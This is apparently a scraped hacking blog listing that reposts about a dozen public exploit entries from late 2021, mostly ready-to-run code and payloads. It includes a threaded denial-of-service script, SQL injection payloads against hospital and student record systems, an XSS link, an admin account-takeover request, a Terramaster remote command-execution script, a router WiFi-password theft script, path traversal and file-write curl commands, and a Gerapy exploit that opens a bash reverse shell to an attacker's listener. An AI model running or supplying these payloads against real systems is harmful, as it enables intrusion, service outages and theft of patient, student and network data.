    # Exploit Title: AWebServer GhostBuilding 18 - Denial of Service (DoS) # Date: 28/12/2021 # Exploit Author: Andres Ramos [Invertebrado] # Vendor Homepage: http://sylkat-tools.rf.gd/awebserver.htm # Software Link: https://play.google.com/store/apps/details?id=com.sylkat.apache&hl=en # Version: AWebServer GhostBuilding 18 # Tested on: Android #!/usr/bin/python3 # ********************************************************************************* # * Author: Andres Ramos [Invertebrado] * # * AWebServer GhostBuilding 18 - Remote Denial of Service (DoS) & System Crash * # ********************************************************************************* import signal import requests from pwn import * #Colors class colors(): GREEN = "\033[0;32m\033[1m" END = "\033[0m" RED = "\033[0;31m\033[1m" BLUE = "\033[0;34m\033[1m" YELLOW = "\033[0;33m\033[1m" PURPLE = "\033[0;35m\033[1m" TURQUOISE = "\033[0;36m\033[1m" GRAY = "\033[0;37m\033[1m" exit = False def def_handler(sig, frame): print(colors.RED + "\n[!] Exiting..." + colors.END) exit = True sys.exit(0) if threading.activeCount() > 1: os.system("tput cnorm") os._exit(getattr(os, "_exitcode", 0)) else: os.system("tput cnorm") sys.exit(getattr(os, "_exitcode", 0)) signal.signal(signal.SIGINT, def_handler) if len(sys.argv) < 3: print(colors.RED + "\n[!] Usage: " + colors.YELLOW + "{} ".format(sys.argv[0]) + colors.RED + "<" + colors.BLUE + "URL" + colors.RED + "> <" + colors.BLUE + "THREADS" + colors.RED +">" + colors.END) sys.exit(1) url = sys.argv[1] Tr = sys.argv[2] def http(): counter = 0 p1 = log.progress(colors.TURQUOISE + "Requests" + colors.END) while True: r = requests.get(url) r = requests.get(url + "/mysqladmin") counter += 2 p1.status(colors.YELLOW + "({}) ({}/mysqladmin)".format(url, url) + colors.GRAY + " = " + colors.GREEN + "[{}]".format(counter) + colors.END) if exit: break if __name__ == '__main__': threads = [] try: for i in range(0, int(Tr)): t = threading.Thread(target=http) threads.append(t) sys.stderr = open("/dev/null", "w") for x in threads: x.start() for x in threads: x.join() except Exception as e: log.failure(str(e)) sys.exit(1)
  15. HireHackking

    Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Hospitalss Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated) # Date: 30/12/2021 # Exploit Author: twseptian # Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip # Version: v1.0 # Tested on: Kali Linux 2021.4 *SQL Injection* SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Hospital's Patient Records Management System v1.0 is vulnerable to SQL injection via the 'id' parameter on the patient list. *Attack Vector* An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap. *Steps to reproduce:* Step-1: On the dashboard navigate to 'Patient List', then go to 'Action' > 'View Records' page using the following URL: http://localhost/hprms/admin/?page=patients/view_patient&id=1 Step-2: Put the SQL Injection payloads in 'id' field. time-based blind payload : page=patients/view_patient&id=1' AND (SELECT 2664 FROM (SELECT(SLEEP(5)))ixec) AND 'XcAY'='XcAY Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.
  16. HireHackking

    BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated) # Google Dork: intext:"BeyondTrust" "Redistribution Prohibited" # Date: 30/12/2021 # Exploit Author: Malcrove # Vendor Homepage: https://www.beyondtrust.com/ # Version: v6.0 and earlier versions Summary: Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint. Vulnerability Details: Affected Endpoint: /appliance/login Affected Parameter: login[password] Request Method: GET or POST Proof of concept (POC): By navigating to the below link from a modern web browser, alert(document.domain) Javascript method would be fired in the same context of Beyondtrust Remote Support domain. http://<bomgar-host>/appliance/login?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password Mitigation: A fix has been released by the vendor in NSBase 6.1. It's recommended to update the vulnerable appliance base version to the latest version. - Time-Line: April 6, 2021: Vulnerability advisory sent to the vendor (Beyondtrust) April 8, 2021: Recevied an initial reply from the vendor Jun 10, 2021: The vendor released a fix for the vulnerability in NSbase 6.1 Dec 30, 2021: The Responsible public disclosure - Credits Ahmed Aboul-Ela (Malcrove)
  17. HireHackking

    Hospitals Patient Records Management System 1.0 - Account TakeOver

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Hospitals Patient Records Management System 1.0 - Account TakeOver # Date: 30/12/2021 # Exploit Author: twseptian # Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip # Version: v1.0 # Tested on: Kali Linux 2021.4 *Insecure direct object references (IDOR)* Insecure Direct Object References (IDOR) occur when an application provides direct access to objects based on user-supplied input.Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system. *Attack Vector* An attacker can takeover the Administrator's account *Steps of reproduce:* Note: in this case, we used two users, user1 as a staff with user id '4', and admin as an Administrator with user id '1'. ===================================================================================================================================== Step-1: Log in to the application using user1 account,then on the dashboard navigate to 'My Account' http://localhost/hprms/admin/?page=user ===================================================================================================================================== Step-2: Modify the username,lastname and password,then let's intercept the request using burpsuite: POST /hprms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239 Content-Length: 806 Origin: http://localhost Connection: close Referer: http://localhost/hprms/admin/?page=user Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="id" 4 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="firstname" user1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="lastname" admin -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="username" admin1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="password" admin1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------17632878732301879013646251239-- ===================================================================================================================================== Step-3: Change parameter id '4' to id '1' POST /hprms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239 Content-Length: 806 Origin: http://localhost Connection: close Referer: http://localhost/hprms/admin/?page=user Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="id" 1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="firstname" user1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="lastname" admin -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="username" admin1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="password" admin1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------17632878732301879013646251239-- ===================================================================================================================================== step-4: Click 'Forward' on burpsuite. Now user1 is a Administrator.
  18. HireHackking

    TRIGONE Remote System Monitor 3.61 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: TRIGONE Remote System Monitor 3.61 - Unquoted Service Path # Discovery by: Yehia Elghaly # Date: 30-12-2021 # Vendor Homepage: https://www.trigonesoft.com/ # Software Link: https://www.trigonesoft.com/download/Remote_System_monitor_Server_3.61_x86_Setup.exe # Tested Version: 3.61 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 7 x86 - Windows Server 2016 x64 # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ TRIGONE Remote System Monitor Server RemoteSystemMonitorService C:\Program Files\TRIGONE\Remote System Monitor Server\RemoteSystemMonitorService.exe Auto C:\>sc qc srvInventoryWebServer [SC] QueryServiceConfig SUCCESS SERVICE_NAME: RemoteSystemMonitorService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\TRIGONE\Remote System Monitor Serv er\RemoteSystemMonitorService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : TRIGONE Remote System Monitor Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  19. HireHackking

    Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated) # Date: 12/24/2021 # Exploit Author: n0tme (thatsn0tmysite) # Full Write-Up: https://thatsn0tmy.site/posts/2021/12/how-to-summon-rces/ # Vendor Homepage: https://www.terra-master.com/ # Version: TOS 4.2.X (4.2.15-2107141517) # Tested on: 4.2.15, 4.2.10 #/bin/env python import urllib3 import requests import json import argparse import hashlib import time import os TARGET = None MAC_ADDRESS = None PWD = None TIMESTAMP = None def tos_encrypt_str(toencrypt): key = MAC_ADDRESS[6:] return hashlib.md5(f"{key}{toencrypt}".encode("utf8")).hexdigest() def user_session(session, username): session.cookies.clear() cookies = {"kod_name":username, "kod_token":tos_encrypt_str(PWD)} if username == "guest": cookies = {"kod_name":"guest", "kod_token":tos_encrypt_str("")} for name,value in cookies.items(): session.cookies[name] = value def download(session, path, save_as=None): user_session(session, "guest") r=session.post(f"{TARGET}/module/api.php?mobile/fileDownload", data={"path":path}) filename = os.path.basename(path) if save_as is not None: filename = save_as with open(filename, "wb") as file: file.write(r.content) def get_admin_users(session): download(session, "/etc/group", save_as="/tmp/terramaster_group") with open("/tmp/terramaster_group", "r") as groups: for line in groups: line = line.strip() fields = line.split(':') if fields[0] == "admin": users = fields[3].split(",") os.remove("/tmp/terramaster_group") return users if __name__ == '__main__': p = argparse.ArgumentParser() p.add_argument(dest="target", help="Target URL (e.g. http://10.0.0.100:8181)") p.add_argument("--cmd", dest="cmd", help="Command to run", default="id") p.add_argument("-d", "--download", dest="download", help="Only download file", default=None) p.add_argument("-o", "--output", dest="save_as", help="Save downloaded file as", default=None) p.add_argument("-c", "--create", dest="create", help="Only create admin user (format should be admin:password)", default=None) p.add_argument("--tor", dest="tor", default=False, action="store_true", help="Use TOR") p.add_argument("--rce", dest="rce", default=0, type=int, help="RCE to use (1 and 2 have no output)") args = p.parse_args() urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) TARGET = args.target s = requests.Session() if args.tor: s.proxies = {"http":"socks5://127.0.0.1:9050", "https": "socks5://127.0.0.1:9050"} s.headers.update({"user-device":"TNAS", "user-agent":"TNAS"}) r=s.post(f"{TARGET}/module/api.php?mobile/wapNasIPS") try: j = r.json() PWD = j["data"]["PWD"] MAC_ADDRESS = j["data"]["ADDR"] except KeyError: exit(1) TIMESTAMP = str(int(time.time())) s.headers.update({"signature": tos_encrypt_str(TIMESTAMP), "timestamp": TIMESTAMP}) s.headers.update({"authorization": PWD}) if args.download != None: download(s, args.download, save_as=args.save_as) exit(0) #RCEs RCEs=[f"{TARGET}/tos/index.php?app/del&id=0&name=;{args.cmd};xx%23", f"{TARGET}/tos/index.php?app/hand_app&name=;{args.cmd};xx.tpk", #BLIND f"{TARGET}/tos/index.php?app/app_start_stop&id=ups&start=0&name=donotcare.*.oexe;{args.cmd};xx"] #BLIND for admin in get_admin_users(s): user_session(s, admin) if args.create != None: user, password = args.create.split(":") groups = json.dumps(["allusers", "admin"]) r=s.post(f"{TARGET}/module/api.php?mobile/__construct") r=s.post(f"{TARGET}/module/api.php?mobile/set_user_information", data={"groups":groups, "username":user,"operation":"0","password":password,"capacity":""}) if "create user successful!" in str(r.content, "utf8"): print(r.content) break continue r = s.get(RCEs[args.rce]) content = str(r.content, "utf-8") if "<!--user login-->" not in content: print(content) exit(0)
  20. HireHackking

    Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection # Google Dork: Powered by Virtual Airlines Manager [v2.6.2] # Date: 2021-12-30 # Exploit Author: Milad Karimi # Vendor Homepage: http://virtualairlinesmanager.net # Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/ # Version: 2.6.2 # Tested on: Ubuntu 19.04 [1] Vulnerable GET parameter: notam_id=[SQLi] [PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi] [2] Vulnerable GET parameter: airport=[SQLi] [PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi] [3] Vulnerable GET parameter: registry_id=[SQLi] [PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi] [4] Vulnerable GET parameter: plane_location=[SQLi] [PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi] [5] Vulnerable GET parameter: hub_id=[SQLi] [PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi] [6] Vulnerable GET parameter: pilot_id=[SQLi] [PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi] [7] Vulnerable GET parameter: registry_id=[SQLi] [PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi] [8] Vulnerable GET parameter: event_id=[SQLi] [PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi] [9] Vulnerable GET parameter: tour_id=[SQLi] [PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]
  21. HireHackking

    Vodafone H-500-s 3.5.10 - WiFi Password Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure # Date: 01/01/2022 # Exploit Author: Daniel Monzón (stark0de) # Vendor Homepage: https://www.vodafone.es/ # Software Link: N/A # Version: Firmware version Vodafone-H-500-s-v3.5.10 # Hardware model: Sercomm VFH500 # The WiFi access point password gets disclosed just by performing a GET request with certain headers import requests import sys import json if len(sys.argv) != 2: print("Usage: python3 vodafone-pass-disclose.py http://IP") sys.exit() url = sys.argv[1]+"/data/activation.json" cookies = {"pageid": "129"} headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept- Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested- With": "XMLHttpRequest", "Connection": "close", "Referer":"http://192.168.0.1/activation.html?mode=basic&lang=en-es&step=129"} req=requests.get(url, headers=headers, cookies=cookies) result=json.loads(req.text)[3].get("wifi_password") print("[+] The wifi password is: "+result)
  22. HireHackking

    openSIS Student Information System 8.0 - 'multiple' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: openSIS Student Information System 8.0 - 'multiple' SQL Injection # Date: 26/12/2021 # Exploit Author: securityforeveryone.com # Author Mail: hello[AT]securityforeveryone.com # Vendor Homepage: https://opensis.com # Software Link: https://opensis.com # Version: 8.0 Community Edition # Tested on: Linux/Windows # Researchers : Security For Everyone Team - https://securityforeveryone.com ''' DESCRIPTION A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v8.0 via the "student_id" and "TRANSFER{SCHOOL]" parameters in POST request sent to /TransferredOutModal.php. The vulnerability is found in the "student_id" and "TRANSFER{SCHOOL]" parameters in POST request sent to page /TransferredOutModal.php. Example: POST /TransferredOutModal.php?modfunc=detail Post Data: student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5 if an attacker exploits this vulnerability, attacker may access private data in the database system. EXPLOITATION POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 Host: localhost User-Agent: user-agent Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: cookie Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 69 student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5 Example sqlmap Command: sqlmap.py -r request.txt --level 5 --risk 3 -p student_id --random-agent --dbs Example Payloads: Payload1: student_id=(SELECT (CASE WHEN (2108=2108) THEN 1 ELSE (SELECT 5728 UNION SELECT 5943) END))&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 Payload2: student_id=1 AND (SELECT 5604 FROM(SELECT COUNT(*),CONCAT(0x7162766a71,(SELECT (ELT(5604=5604,1))),0x717a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 Payload3: student_id=1 AND (SELECT 6111 FROM (SELECT(SLEEP(5)))JtuC)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 ABOUT SECURITY FOR EVERYONE TEAM We are a team that has been working on cyber security in the industry for a long time. In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities. We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools '''
  23. HireHackking

    TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated) # Date: 03/01/2022 # Exploit Author: Fabiano Golluscio @ Swascan # Vendor Homepage: https://www.solari.it/it/ # Software Link: https://www.solari.it/it/solutions/other-solutions/access-control/ # Version: 3.24.0.2 # Fixed Version: 3.26.1.7 # Reference: https://www.swascan.com/solari-di-udine/ POC curl http://url:port/file?valore=../../../../WINDOWS/System32/drivers/etc/hosts
  24. HireHackking

    Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated) # Date: 03/01/2022 # Exploit Author: Jeremiasz Pluta # Vendor Homepage: https://github.com/Gerapy/Gerapy # Version: All versions of Gerapy prior to 0.9.8 # CVE: CVE-2021-43857 # Tested on: Gerapy 0.9.6 # Vulnerability: Gerapy prior to version 0.9.8 is vulnerable to remote code execution. This issue is patched in version 0.9.8. #!/usr/bin/python import sys import re import argparse import pyfiglet import requests import time import json import subprocess banner = pyfiglet.figlet_format("CVE-2021-43857") print(banner) print('Exploit for CVE-2021-43857') print('For: Gerapy < 0.9.8') login = "admin" #CHANGE ME IF NEEDED password = "admin" #CHANGE ME IF NEEDED class Exploit: def __init__(self, target_ip, target_port, localhost, localport): self.target_ip = target_ip self.target_port = target_port self.localhost = localhost self.localport = localport def exploitation(self): payload = """{"spider":"`/bin/bash -c 'bash -i >& /dev/tcp/""" + localhost + """/""" + localport + """ 0>&1'`"}""" #Login to the app (getting auth token) url = "http://" + target_ip + ":" + target_port r = requests.Session() print("[*] Resolving URL...") r1 = r.get(url) time.sleep(3) print("[*] Logging in to application...") r2 = r.post(url + "/api/user/auth", json={"username":login,"password":password}, allow_redirects=True) time.sleep(3) if (r2.status_code == 200): print('[*] Login successful! Proceeding...') else: print('[*] Something went wrong!') quit() #Create a header out of auth token (yep, it's bad as it looks) dict = json.loads(r2.text) temp_token = 'Token ' temp_token2 = json.dumps(dict['token']).strip('"') auth_token = {} auth_token['Authorization'] = temp_token + temp_token2 #Get the project list print("[*] Getting the project list") r3 = r.get(url + "/api/project/index", headers=auth_token, allow_redirects=True) time.sleep(3) if (r3.status_code != 200): print("[!] Something went wrong! Maybe the token is corrupted?") quit(); #Parse the project name for a request (yep, it's worse than earlier) dict = r3.text # [{'name': 'test'}] dict2 = json.dumps(dict) dict3 = json.loads(dict2) dict3 = json.loads(dict3) name = dict3[0]['name'] print("[*] Found project: " + name) #use the id to check the project print("[*] Getting the ID of the project to build the URL") r4 = r.get(url + "/api/project/" + name + "/build", headers=auth_token, allow_redirects=True) time.sleep(3) if (r4.status_code != 200): print("[*] Something went wrong! I can't reach the found project!") quit(); #format the json to dict dict = r4.text dict2 = json.dumps(dict) dict3 = json.loads(dict2) dict3 = json.loads(dict3) id = dict3['id'] print("[*] Found ID of the project: ", id) time.sleep(1) #netcat listener print("[*] Setting up a netcat listener") listener = subprocess.Popen(["nc", "-nvlp", self.localport]) time.sleep(3) #exec the payload print("[*] Executing reverse shell payload") print("[*] Watchout for shell! :)") r5 = r.post(url + "/api/project/" + str(id) + "/parse", data=payload, headers=auth_token, allow_redirects=True) listener.wait() if (r5.status_code == 200): print("[*] It worked!") listener.wait() else: print("[!] Something went wrong!") listener.terminate() def get_args(): parser = argparse.ArgumentParser(description='Gerapy < 0.9.8 - Remote Code Execution (RCE) (Authenticated)') parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') parser.add_argument('-L', '--lh', dest="localhost", required=True, action='store', help='Listening IP') parser.add_argument('-P', '--lp', dest="localport", required=True, action='store', help='Listening port') args = parser.parse_args() return args args = get_args() target_ip = args.url target_port = args.target_port localhost = args.localhost localport = args.localport exp = Exploit(target_ip, target_port, localhost, localport) exp.exploitation()
  25. HireHackking

    Dixell XWEB 500 - Arbitrary File Write

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Dixell XWEB-500 - Arbitrary File Write # Google Dork: inurl:"xweb500.cgi" # Date: 03/01/2022 # Exploit Author: Roberto Palamaro # Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it # Version: XWEB-500 # Tested on: Dixell XWEB-500 # References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/ # Emerson Dixell XWEB-500 is affected by multiple Arbitrary File Write Vulnerability # Endpoint: logo_extra_upload.cgi # Here the first line of the POC is the filename and the second one is the content of the file be written # Write file echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' # Verify curl -A Chrome -is "http://[target]:[port]/logo/" # Endpoint: lo_utils.cgi # Here ACTION=5 is to enable write mode echo -e "ACTION=5\nfile.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' # Verify using ACTION=3 to listing resources echo -e "ACTION=3" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' # Endpoint: cal_save.cgi # Here the first line of the POC is the filename and the second one is the content of the file be written echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' # Verify curl -A Chrome -kis http://[target]:[port]/cgi-bin/cal_dir.cgi